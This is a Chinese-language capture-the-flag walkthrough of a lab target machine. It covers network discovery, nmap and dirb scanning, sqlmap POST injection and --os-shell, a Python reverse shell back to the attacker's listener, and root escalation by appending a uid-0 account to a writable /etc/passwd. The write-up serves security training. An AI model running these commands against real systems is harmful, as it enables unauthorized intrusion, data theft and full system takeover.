靶机地址:192.168.43.130
kali地址:192.168.43.128
第一步、netdiscover收集IP地址
使用 netdiscover 二层发现工具扫描虚拟机同段地址即可,拥有主动和被动发现两种方式
netdiscover
第二步、使用nmap工具扫描开放的端口
nmap -sS -sV -A -n 192.168.43.130 //-sS 半开放扫描 -sV 发送tcp探测存活 -A 显示系统和版本 -n不进行dns解析
经过扫描发现开放了80端口,使用的中间件是Apache。
使用浏览器访问web发现并没有什么可用的信息。
第三步、使用目录扫描dirb工具扫一下网站目录
dirb http://192.168.43.130
通过扫描发现有几个文件其中有一个爬虫协议文件robots.txt
进入robots.txt文件发现有两个目录文件
对这里两个目录,进行一级和二级扫描发现存在php配置文件。在这里暴露了网站的根目录。
第四步、使用sqlmap进行sql注入
通过浏览器访问有权限访问,并且存在注入点手动测试以后,直接抓包看一下注入点
列出库
sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs //-u 指定链接 --data 通过POST发送的数据字符串 ,--dbs列出数据库
列出表名
sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables //-D指定数据库 --tables 列出表
查字段
sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns //-D 指定数据库 -T 指定表名 --coulumns 列出字段
把所有的字段都查以后并没有发现没有啥可以利用的信息于是尝试使用
sqlmap的–os-shell命令
第五步、反弹shell
os-shell执行条件有三个:
1.网站必须是root权限
2.网站的绝对路径已知(前面暴露的info.php文件已经拿到绝对路径)
3.GPC为off(php主动转义的功能关闭)
sqlmap -u "http://192.168.43.130/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell //--level执行测试的等级(1-5,默认为1) --os-shell 交互式的操作系统的shell
直接使用发现有限,先输入4选择php然后在输入2自定义路径,在这里的路径是使用info.php文件里面拿到的绝对路径/home/www/html/web1x443290o2sdf92213/和 se3reTdir777/uploads/路径拼接起来的
这里成功反弹回一个交互式命令
第六步、提权
这里由于重置网卡后靶机IP为192.168.233.129,
Kali的IP为192.168.233.130
于是用过python反弹shell并在卡里监听4567端口
先在kali上开启监听端口4567
nc -vlnp 4567
在kali上获取到shell窗口输入
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.233.130",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
这一步成功获取到反弹了一个shell出来但是获取到的shell窗口使用起来很难受,于是使用python转换成交互式shell就舒服很多了
python -c 'import pty;pty.spawn("/bin/bash")'
通过查看当前权限发现不是是www-data用户
发现当前用户不是root用户但是这个用户可以对/etc/passwd 文件进行读写权限
所以我们尝试添加一个用户来登录。
openssl passwd -1 -salt web1 123456 //用openssl生成用户,用户名为web1 ,密码为 123456
$1$web1$ZrYgDZgZpLlsnVlxUaZwh //生成后/etc/passwd储存用户格式的文件
panda:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0:root:/root:/bin/bash //写入/etc/passwd文件的格式
然后再来写入密码:
echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd
切换用户到我们刚刚自己创建的 web1
然后把我们刚刚成功创建的用户直接登录靶机即可。发现flag就在根目录下